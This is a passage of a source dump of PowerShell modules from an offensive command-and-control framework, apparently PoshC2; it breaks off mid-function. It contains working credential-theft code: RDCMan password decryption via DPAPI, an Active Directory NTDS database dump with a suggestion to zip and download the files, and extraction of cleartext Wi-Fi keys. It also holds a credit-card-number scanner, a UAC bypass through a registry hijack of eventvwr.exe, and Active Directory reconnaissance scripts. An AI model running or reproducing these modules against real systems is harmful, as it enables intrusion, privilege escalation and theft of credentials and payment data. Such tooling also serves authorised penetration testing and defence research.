-------------------------------------------------------------------------------- /resources/modules/Decrypt-RDCMan.ps1: -------------------------------------------------------------------------------- 1 | function Decrypt-RDCMan ($FilePath) { 2 | <# 3 | .SYNOPSIS 4 | 5 | This script should be able to decrpt all passwords stored in the RDCMan config file 6 | 7 | Function: Decrypt-RDCMan 8 | Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_ 9 | 10 | .EXAMPLE 11 | 12 | Decrypt-RDCMan -FilePath 13 | #> 14 | if (!$FilePath) { 15 | [xml]$config = Get-Content "$env:LOCALAPPDATA\microsoft\remote desktop connection manager\rdcman.settings" 16 | $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" 17 | $Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText} 18 | } else { 19 | [xml]$Types = Get-Content $FilePath 20 | 21 | $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" 22 | 23 | # depending on the RDCMan version we may need to change the XML search 24 | $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "\" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" } 25 | 26 | # depending on the RDCMan version, we may have to use search through the #text field in the XML structure 27 | $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "\" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"} 28 | } 29 | } 30 | 31 | function Decrypt-DPAPI ($EncryptedString) { 32 | # load the Security Assembly into the PS runspace 33 | Add-Type -assembly System.Security 34 | $encoding= [System.Text.Encoding]::ASCII 35 | $uencoding = [System.Text.Encoding]::UNICODE 36 | 37 | # try and decrypt the password with the CurrentUser Scope 38 | try { 39 | $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) 40 | $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) 41 | [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_} 42 | echo $myStr1 43 | } 44 | catch { 45 | # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails 46 | try { 47 | $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) 48 | $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) 49 | [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_} 50 | echo $myStr1 51 | } 52 | catch { 53 | echo "Could not decrypt password" 54 | } 55 | } 56 | } 57 | 58 | 59 | -------------------------------------------------------------------------------- /resources/modules/Dump-NTDS.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Dumps the active directory dit using ntdsutil 4 | .DESCRIPTION 5 | Dumps the active directory dit using ntdsutil 6 | .EXAMPLE 7 | PS C:\>Dump-NTDS -EmptyFolder C:\Temp\NTDS\ 8 | #> 9 | function Dump-NTDS 10 | { 11 | [cmdletbinding()] 12 | Param 13 | ( 14 | [string[]]$EmptyFolder 15 | ) 16 | 17 | if( (Get-ChildItem $EmptyFolder | Measure-Object).Count -eq 0) 18 | { 19 | if (Test-Administrator) { 20 | NTdsutil.exe "activate instance ntds" "ifm" "create full $($EmptyFolder) " "q" "q" 21 | } else { 22 | Write-Output "Not running in elevated mode - must run as administrator" 23 | } 24 | } else { 25 | Write-Output "Folder is not empty, must use an empty folder" 26 | } 27 | 28 | Write-Output "If successfull, Zip the files and download using - New-ZipFile c:\temp\test.zip c:\temp\test\" 29 | } 30 | function Test-Administrator 31 | { 32 | $user = [Security.Principal.WindowsIdentity]::GetCurrent(); 33 | (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 34 | } 35 | 36 | -------------------------------------------------------------------------------- /resources/modules/Echo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Echo.exe -------------------------------------------------------------------------------- /resources/modules/EventLogSearcher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/EventLogSearcher.exe -------------------------------------------------------------------------------- /resources/modules/FComm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/FComm.exe -------------------------------------------------------------------------------- /resources/modules/FileGrep.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/FileGrep.exe -------------------------------------------------------------------------------- /resources/modules/Get-CreditCardData.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Searches recursively through the provided path searching for valid credit card numbers 4 | .DESCRIPTION 5 | Large files are read in chunks so as to not exhaust system resources 6 | .EXAMPLE 7 | PS C:\> Get-CreditCardData -Path C:\Backup\ 8 | #> 9 | 10 | Function Get-CreditCardData { 11 | 12 | param ( 13 | [string]$path = $(throw "-path is required";) 14 | ) 15 | 16 | #$Excel = New-Object -ComObject Excel.Application 17 | 18 | $REGEX = [regex]"(?im)(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})" 19 | $REGEX2 = [regex]"^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$" 20 | $REGEX3 = [regex]"[456][0-9]{15}","[456][0-9]{3}[-| ][0-9]{4} [-| ][0-9]{4}[-| ][0-9]{4}" 21 | 22 | Get-ChildItem -Rec -Exclude *.exe,*.dll $path -File | % { 23 | 24 | #if (($_.FullName -like "*xls") -or ($_.FullName -like "*.xlsx")){ 25 | #$Workbook = $Excel.Workbooks.Open($_.FullName) 26 | #If(($Workbook.Sheets.Item(1).Range("A:Z")) | Select-String -pattern $REGEX){ 27 | # $Workbook.Close($false) 28 | # Write-Output "[+] Potential Card data found:" $_.FullName -ForegroundColor green 29 | #} 30 | #} 31 | 32 | if ((Select-String -pattern $REGEX -Path $_.FullName -AllMatches).Matches.Count -gt 5 ) { 33 | Write-Output "[+] Potential Card data found:" $_.FullName -ForegroundColor green 34 | return 35 | } 36 | 37 | } 38 | 39 | } 40 | 41 | # Sample credit card data for testing 42 | #3782 8224 6310 0054 43 | #371449635398431 44 | #371449635398432 45 | #371449635398434 46 | #371449635398432 47 | #371449635398430 48 | #371449635398432 49 | -------------------------------------------------------------------------------- /resources/modules/Get-FirewallRules.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Returns all firewall rules 4 | .DESCRIPTION 5 | Returns all firewall rules 6 | .EXAMPLE 7 | PS C:\> Get-FirewallRule -Enabled $true | sort direction,applicationName,name 8 | .EXAMPLE 9 | PS C:\> Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -wrap -autosize -property Name, @{Label="Action"; expression={$Fwaction[$_.action]}},@{label="Direction";expression={ $fwdirection[$_.direction]}},@{Label="Protocol"; expression={$FwProtocols[$_.protocol]}}, localPorts,applicationname 10 | #> 11 | Function Get-FireWallRule 12 | { 13 | Param ( 14 | $Name, 15 | $Direction, 16 | $Enabled, 17 | $Protocol, 18 | $profile, 19 | $action, 20 | $grouping 21 | ) 22 | 23 | $Rules = (New-object -comObject HNetCfg.FwPolicy2).rules 24 | If ($name) { $rules= $rules | where-object {$_.name -like $name}} 25 | If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}} 26 | If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}} 27 | If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}} 28 | If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}} 29 | If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}} 30 | If ($Grouping) {$rules= $rules | where-object {$_.Grouping -Like $Grouping}} 31 | 32 | $rules 33 | 34 | } 35 | 36 | 37 | Function Get-FireWallRulesAll 38 | { 39 | 40 | Netsh.exe Advfirewall show allprofiles 41 | 42 | $spaces1 = " " * 71 43 | $spaces2 = " " * 64 44 | Get-FireWallRule -Enabled $true | sort name | ` 45 | format-table -property ` 46 | @{label="Name" + $spaces1 ; expression={$_.name} ; width=75}, ` 47 | @{label="Action" ; expression={$Fwaction[$_.action]} ; width=6 }, ` 48 | @{label="Direction" ; expression={$fwdirection[$_.direction]} ; width=9 }, ` 49 | @{label="Protocol" ; expression={$FwProtocols[$_.protocol]} ; width=8 }, ` 50 | @{label="Local Ports" ; expression={$_.localPorts} ; width=11}, ` 51 | @{label="Application Name" + $spaces2 ; expression={$_.applicationname} ; width=80} 52 | 53 | } 54 | -------------------------------------------------------------------------------- /resources/modules/Get-IPConfig.ps1: -------------------------------------------------------------------------------- 1 | # https://gallery.technet.microsoft.com/scriptcenter/IPConfig-all-cfe08dc0 2 | 3 | function Get-Ipconfig { 4 | 5 | $array= @() 6 | 7 | $wmi=Get-WmiObject win32_ComputerSystem 8 | 9 | $obj=New-Object PSObject 10 | 11 | $obj |Add-Member -MemberType NoteProperty -Name "ComputerName" $wmi.Name 12 | 13 | # Finding the Network Adapter and MAC Address, DHCP Server 14 | 15 | $wmi=Get-WmiObject win32_networkadapterconfiguration | where {$_.Ipenabled -Match "True"} 16 | $obj |Add-Member -MemberType NoteProperty -Name "IPAddress" $wmi.IPAddress 17 | $obj |Add-Member -MemberType NoteProperty -Name "NetworkAdapter" $wmi.description 18 | $obj |Add-Member -MemberType NoteProperty -Name "MACAddress" $wmi.macaddress 19 | $obj |Add-Member -MemberType NoteProperty -Name "DefaultGateway" $wmi.DefaultIPGateway 20 | $obj |Add-Member -MemberType NoteProperty -Name "DHCPServer" $wmi.DHCPServer 21 | $obj |Add-Member -MemberType NoteProperty -Name "DHCPEnabled" $wmi.DHCPEnabled 22 | $obj |Add-Member -MemberType NoteProperty -Name "SubnetMask" $wmi.IPSubnet 23 | $obj |Add-Member -MemberType NoteProperty -Name "DNSServer" $wmi.DnsServerSearchOrder 24 | $obj |Add-Member -MemberType NoteProperty -Name "WinsPrimaryServer" $wmi.WinsPrimaryServer 25 | $obj |Add-Member -MemberType NoteProperty -Name "WinsSecondaryServer" $wmi.WinsSecondaryServer 26 | $array +=$obj 27 | 28 | echo "[+] IPConfig " 29 | echo $array 30 | 31 | } 32 | -------------------------------------------------------------------------------- /resources/modules/Get-InjectedThreads.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Get-InjectedThreads.ps1 -------------------------------------------------------------------------------- /resources/modules/Get-LocAdm.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Returns members of the Local Admins group 4 | .DESCRIPTION 5 | Retrieves all computers from Active Direcrory and searches and returns the members of the Local Admins group 6 | .EXAMPLE 7 | PS C:\> Get-LocAdm 8 | 9 | #> 10 | Function Get-LocAdm 11 | { 12 | $DirSearcher = New-Object -TypeName DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]'') 13 | $DirSearcher.Filter = '(objectClass=computer)' 14 | $Computers = $DirSearcher.Findall() 15 | Foreach ($Computer in $Computers) 16 | { 17 | $Path = $Computer.Path 18 | $Name = ([ADSI]"$Path").Name 19 | Write-Output -InputObject $Name 20 | Write-Output -InputObject 'Members of the Local Admins group' 21 | Write-Output -InputObject '=================================' 22 | $members = [ADSI]"WinNT://$Name/Administrators" 23 | $members = @($members.psbase.Invoke('Members')) 24 | $members | ForEach-Object -Process { 25 | $_.GetType().InvokeMember('Name', 'GetProperty', 26 | $null, $_, $null) 27 | } 28 | Write-Output -InputObject `n 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /resources/modules/Get-MSHotFixes.ps1: -------------------------------------------------------------------------------- 1 | function Get-MSHotFixes 2 | { 3 | <# 4 | .Synopsis 5 | Cmdlet to retrive the install Microsoft hotfixes 6 | .Description 7 | The cmdlet retrives all installled Microsoft hotfixes using WMI, specifically Win32_QuickFixEngineering class 8 | Previously this was achieved by executing 'wmic qfe list' via Invoke-Expression, however this produced a pop-up window and Invoke-Expression could trigger various warnings or alerts. 9 | 10 | Version 1.0 11 | 12 | .Example 13 | Get-MSHotfixes 14 | 15 | Description HotfixID caption InstalledOn 16 | ----------- -------- ------- ----------- 17 | Security Update KB3200970 http://support.microsoft.com/?kbid=3200970 18/11/2016 00:00:00 18 | Security Update KB3202790 http://support.microsoft.com/?kbid=3202790 17/11/2016 00:00:00 19 | Update KB3199986 http://support.microsoft.com/?kbid=3199986 03/11/2016 00:00:00 20 | Update KB2693643 02/11/2016 00:00:00 21 | Update KB3199209 http://support.microsoft.com/?kbid=3199209 18/10/2016 00:00:00 22 | Update KB3176936 http://support.microsoft.com/?kbid=3176936 24/08/2016 00:00:00 23 | 24 | Retrive all installed hotfixes 25 | 26 | .Example 27 | Get-MSHotFixes | Where-Object -Property hotfixid -EQ KB3176936 28 | 29 | Description HotfixID caption InstalledOn 30 | ----------- -------- ------- ----------- 31 | Update KB3176936 http://support.microsoft.com/?kbid=3176936 24/08/2016 00:00:00 32 | 33 | Determine if a specific patch is installed for later versions of Powershell 34 | 35 | .Example 36 | Get-MSHotFixes | Where-Object {$_.hotfixid -eq "KB2852386"} 37 | Description HotfixID Caption InstalledOn 38 | ----------- -------- ------- ----------- 39 | Update KB2852386 http://support.microsoft.com/?kbid... 14/11/2016 00:00:00 40 | 41 | This is for PowerShell v2.0 installed on Windows 7 42 | 43 | 44 | #> 45 | 46 | $hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering 47 | $hotfixes | Select-Object -Property Description, HotfixID, Caption,@{l="InstalledOn";e={[DateTime]::Parse($_.psbase.properties["installedon"].value,$([System.Globalization.CultureInfo]::GetCultureInfo("en-US")))}} | Sort-Object -Descending InstalledOn 48 | } 49 | -------------------------------------------------------------------------------- /resources/modules/Get-PassNotExp.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Identify accounts with passwords set not to expire 4 | .DESCRIPTION 5 | Searches Active Directory for user accounts the have the flag set to allow the password never to expire 6 | .EXAMPLE 7 | PS C:\> Pass-NotExp 8 | #> 9 | function Get-PassNotExp 10 | { 11 | $strFilter = '(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=65536))' 12 | $objDomain = New-Object System.DirectoryServices.DirectoryEntry 13 | $objSearcher = New-Object System.DirectoryServices.DirectorySearcher 14 | $objSearcher.SearchRoot = $objDomain 15 | $objSearcher.PageSize = 1000 16 | $objSearcher.Filter = $strFilter 17 | $colProplist = 'name' 18 | Write-Output 'Users with Password set NOT to Expire' 19 | Write-Output '=====================================' 20 | foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)} 21 | $colResults = $objSearcher.FindAll() 22 | foreach ($objResult in $colResults) 23 | {$objItem = $objResult.Properties; $objItem.name} 24 | } 25 | -------------------------------------------------------------------------------- /resources/modules/Get-PassPol.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Retrives the default active directory password policy 4 | .DESCRIPTION 5 | Retrives the default active directory password policy 6 | .EXAMPLE 7 | PS C:\> Pass-Pol 8 | Output the default domain password policy 9 | #> 10 | function Get-PassPol 11 | { 12 | $domain = [ADSI]"WinNT://$env:userdomain" 13 | $Name = @{Name='DomainName';Expression={$_.Name}} 14 | $MinPassLen = @{Name='Minimum Password Length (Chars)';Expression={$_.MinPasswordLength}} 15 | $MinPassAge = @{Name='Minimum Password Age (Days)';Expression={$_.MinPasswordAge.value/86400}} 16 | $MaxPassAge = @{Name='Maximum Password Age (Days)';Expression={$_.MaxPasswordAge.value/86400}} 17 | $PassHistory = @{Name='Enforce Password History (Passwords remembered)';Expression={$_.PasswordHistoryLength}} 18 | $AcctLockoutThreshold = @{Name='Account Lockout Threshold (Invalid logon attempts)';Expression={$_.MaxBadPasswordsAllowed}} 19 | $AcctLockoutDuration = @{Name='Account Lockout Duration (Minutes)';Expression={if ($_.AutoUnlockInterval.value -eq -1) {'Account is locked out until administrator unlocks it.'} else {$_.AutoUnlockInterval.value/60}}} 20 | $ResetAcctLockoutCounter = @{Name='Reset Account Lockout Counter After (Minutes)';Expression={$_.LockoutObservationInterval.value/60}} 21 | $domain | Select-Object $Name,$MinPassLen,$MinPassAge,$MaxPassAge,$PassHistory,$AcctLockoutThreshold,$AcctLockoutDuration,$ResetAcctLockoutCounter 22 | } 23 | $PassPol = Get-PassPol 24 | Write-Output 'Domain Password Policy: ' 25 | Write-Output $PassPol 26 | -------------------------------------------------------------------------------- /resources/modules/Get-RecentFiles.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RecentFiles { 2 | $obj = New-Object -ComObject WScript.Shell 3 | $Path = [System.Environment]::GetFolderPath('Recent') 4 | $files = Get-ChildItem -Path $Path | Sort-Object LastAccessTime | Select-Object -Last 50 5 | echo "" 6 | echo "[+] Get-RecentFiles" 7 | echo "" 8 | foreach ($file in $files) 9 | { 10 | $extn = [IO.Path]::GetExtension($file) 11 | if ($extn -eq ".lnk" ) 12 | { 13 | try { 14 | $lnk = $file.versioninfo.filename 15 | $lnkfile = $obj.CreateShortcut($lnk).TargetPath 16 | if ($lnkfile) { 17 | echo $lnkfile 18 | } 19 | } catch {} 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /resources/modules/Get-UserInfo.ps1: -------------------------------------------------------------------------------- 1 | function Get-UserInfo 2 | { 3 | Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}} 4 | $arr = @() 5 | $Users = Get-WmiObject -Query "Select * from Win32_UserAccount Where LocalAccount = True" 6 | echo "" 7 | echo "======================" 8 | echo "Local Users" 9 | echo "======================" 10 | foreach ($usr in $Users) { 11 | $usr.Name 12 | } 13 | $GroupNames = Get-WmiObject -Query "SELECT * FROM Win32_Group Where LocalAccount = True" 14 | echo "" 15 | echo "======================" 16 | echo "Local Groups" 17 | echo "======================" 18 | foreach ($grp in $GroupNames) { 19 | $grp.Name 20 | } 21 | 22 | $hostname = (Get-WmiObject -Class Win32_ComputerSystem).Name 23 | echo "" 24 | echo "======================" 25 | echo "Members of Local Groups" 26 | echo "======================" 27 | 28 | foreach ($Group in $GroupNames) { 29 | $GroupName = $Group.Name 30 | $wmi = Get-WmiObject -Query "SELECT * FROM Win32_GroupUser WHERE GroupComponent=`"Win32_Group.Domain='$Hostname',Name='$GroupName'`"" 31 | 32 | if ($wmi -ne $null) 33 | { 34 | foreach ($item in $wmi) 35 | { 36 | $data = $item.PartComponent -split "\," 37 | $domain = ($data[0] -split "=")[1] 38 | $name = ($data[1] -split "=")[1] 39 | $arr += ("$domain\$name").Replace("""","") 40 | [Array]::Sort($arr) 41 | } 42 | } 43 | if ($arr.Count -gt 0) { 44 | echo "" 45 | echo $GroupName 46 | echo "======================" 47 | echo $arr 48 | } 49 | $arr = @() 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /resources/modules/Get-UserLogons.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Gets User Logon Events 4 | 5 | Author: @m0rv4i 6 | 7 | .DESCRIPTION 8 | 9 | Lists User Logon Events from an event log and lists them with timestamps and from which hostname. 10 | 11 | Events where the hostname is '-' and machine logon events are excluded. 12 | 13 | .PARAMETER Newest 14 | 15 | Check the newest X events. Defaults to 200. 16 | 17 | .PARAMETER ComputerName 18 | 19 | Computername to run against using PSRemoting. Defaults to local host. 20 | 21 | .PARAMETER ExclusionList 22 | 23 | Account names to exclude. Defaults to "SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1". 24 | 25 | .PARAMETER ServiceAccounts 26 | 27 | Whether to logic service accounts or not. Defaults to false. 28 | Service accounts are accounts starting with SVC_, SVC-, svc_ or svc-. 29 | 30 | .EXAMPLE 31 | 32 | PS C:\> Get-UserLogons 33 | 34 | 2020-08-17 10:52:40 : BEEROCLOCK\bob -> BEEROCLOCK 35 | 2020-08-17 10:52:40 : BEEROCLOCK\bob -> BEEROCLOCK 36 | 2020-08-14 19:00:48 : BEEROCLOCK\bob -> BEEROCLOCK 37 | 2020-08-14 19:00:48 : BEEROCLOCK\bob -> BEEROCLOCK 38 | 2020-08-12 21:00:05 : BEEROCLOCK\bob -> BEEROCLOCK 39 | 2020-08-12 21:00:05 : BEEROCLOCK\bob -> BEEROCLOCK 40 | 41 | .EXAMPLE 42 | 43 | PS C:\> Get-UserLogons -Newest 20000 -ServiceAccounts -ComputerName DC01.DOMAIN.LOCAL 44 | 45 | .EXAMPLE 46 | 47 | PS C:\> $exclusions = $("SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1", "ACCOUNT1", "ACCOUNT2") 48 | PS C:\> Get-UserLogons -ServiceAccounts -ComputerName DC01.DOMAIN.LOCAL -ExclusionList $exclusions 49 | 50 | #> 51 | function Get-UserLogons() 52 | { 53 | [CmdletBinding()] 54 | Param 55 | ( 56 | [string[]]$ExclusionList = $("SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1"), 57 | [int]$Newest = 200, 58 | [switch]$ServiceAccounts = $false, 59 | [string]$ComputerName = "" 60 | ) 61 | 62 | Write-Output "" 63 | 64 | if($ComputerName) 65 | { 66 | $LogonEvents = Get-EventLog -newest $Newest -logname security -instanceid 4624 -ComputerName $ComputerName 67 | } 68 | else 69 | { 70 | $LogonEvents = Get-EventLog -newest $Newest -logname security -instanceid 4624 71 | } 72 | 73 | foreach($Events in $LogonEvents) 74 | { 75 | 76 | $LogonUsername = $Events.ReplacementStrings[5] 77 | $LogonHostname = $Events.ReplacementStrings[11] 78 | $LogonDomain = $Events.ReplacementStrings[6] 79 | 80 | if($ExclusionList -contains $LogonUsername) 81 | { 82 | continue 83 | } 84 | 85 | if($LogonHostname -eq "-") 86 | { 87 | continue 88 | } 89 | 90 | if($LogonUsername.Trim("`$") -eq $LogonHostname) 91 | { 92 | continue 93 | } 94 | 95 | if(!$ServiceAccounts) 96 | { 97 | if($LogonUsername.ToLower().StartsWith("svc_") -or $LogonUsername.ToLower().StartsWith("svc-")) 98 | { 99 | continue 100 | } 101 | } 102 | 103 | Write-Output "$($Events.TimeGenerated.ToString("yyyy-MM-dd HH:mm:ss")) : $LogonDomain\$LogonUsername -> $LogonHostname" 104 | 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /resources/modules/Get-WLANPass.ps1: -------------------------------------------------------------------------------- 1 | function Get-WLANPass 2 | { 3 | <# 4 | .Synopsis 5 | Retrives password from stored wlan profiles 6 | .DESCRIPTION 7 | Retrives password from stored wlan profiles 8 | .EXAMPLE 9 | PS C:\> Get-WLANPass 10 | Output stored WLAN Profile passwords 11 | #> 12 | $netsh = (netsh wlan show profiles) 13 | $netsh | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize 14 | } 15 | -------------------------------------------------------------------------------- /resources/modules/GetCreds.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/GetCreds.exe -------------------------------------------------------------------------------- /resources/modules/GetInstallerInfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/GetInstallerInfo.exe -------------------------------------------------------------------------------- /resources/modules/IPConfigCS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/IPConfigCS.exe -------------------------------------------------------------------------------- /resources/modules/InternalMonologue.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/InternalMonologue.exe -------------------------------------------------------------------------------- /resources/modules/Inveigh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Inveigh.exe -------------------------------------------------------------------------------- /resources/modules/Invoke-EventVwrBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-EventVwrBypass { 2 | <# 3 | .SYNOPSIS 4 | 5 | Bypasses UAC by performing an image hijack on the .msc file extension 6 | Expected to work on Win7, 8.1 and Win10 7 | 8 | Only tested on Windows 7 and Windows 10 9 | 10 | Author: Matt Nelson (@enigma0x3) 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .PARAMETER Command 16 | 17 | Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " 18 | 19 | .EXAMPLE 20 | 21 | Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" 22 | 23 | This will write out "Is Elevated: True" to C:\UACBypassTest. 24 | 25 | #> 26 | 27 | [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] 28 | Param ( 29 | [Parameter(Mandatory = $True)] 30 | [ValidateNotNullOrEmpty()] 31 | [String] 32 | $Command, 33 | 34 | [Switch] 35 | $Force 36 | ) 37 | 38 | $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" 39 | #Add in the new registry entries to hijack the msc file 40 | if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ 41 | New-Item $mscCommandPath -Force | 42 | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null 43 | }else{ 44 | Write-Verbose "Key already exists, consider using -Force" 45 | exit 46 | } 47 | 48 | if (Test-Path $mscCommandPath) { 49 | Write-Verbose "Created registry entries to hijack the msc extension" 50 | }else{ 51 | Write-Warning "Failed to create registry key, exiting" 52 | exit 53 | } 54 | 55 | 56 | $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' 57 | 58 | #Start Event Viewer 59 | if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { 60 | $Process = Start-Process -FilePath $EventvwrPath -PassThru 61 | Write-Verbose "Started eventvwr.exe" 62 | } 63 | 64 | #Sleep 5 seconds 65 | Write-Verbose "Sleeping 5 seconds to trigger payload" 66 | if (-not $PSBoundParameters['WhatIf']) { 67 | Start-Sleep -Seconds 5 68 | } 69 | 70 | $mscfilePath = "HKCU:\Software\Classes\mscfile" 71 | 72 | if (Test-Path $mscfilePath) { 73 | #Remove the registry entry 74 | Remove-Item $mscfilePath -Recurse -Force 75 | Write-Verbose "Removed registry entries" 76 | } 77 | 78 | if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ 79 | Stop-Process -Id $Process.Id 80 | Write-Verbose "Killed running eventvwr process" 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /resources/modules/Invoke-Sharp.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Execute Sharp Assembly in PowerhShell 4 | .DESCRIPTION 5 | Execute Sharp Assembly in PowerhShell 6 | .EXAMPLE 7 | PS C:\> Invoke-Sharp -asmName "ASMNAME" -asmArgs @("--listAll", "local", "\") 8 | .EXAMPLE 9 | PS C:\> Invoke-Sharp -asmName "ASMNAME" -asmArgs @("--addTask", "local", "09:30", "\", "TaskName", "Task Description", "C:\Windows\system32\cmd.exe", "/c calc.exe") 10 | #> 11 | function Invoke-Sharp { 12 | param ( 13 | [string]$asmName, 14 | [string[]]$asmArgs 15 | ) 16 | $sw = New-Object System.IO.StringWriter 17 | $originalOut = [Console]::Out 18 | try { 19 | [Console]::SetOut($sw) 20 | $asm = 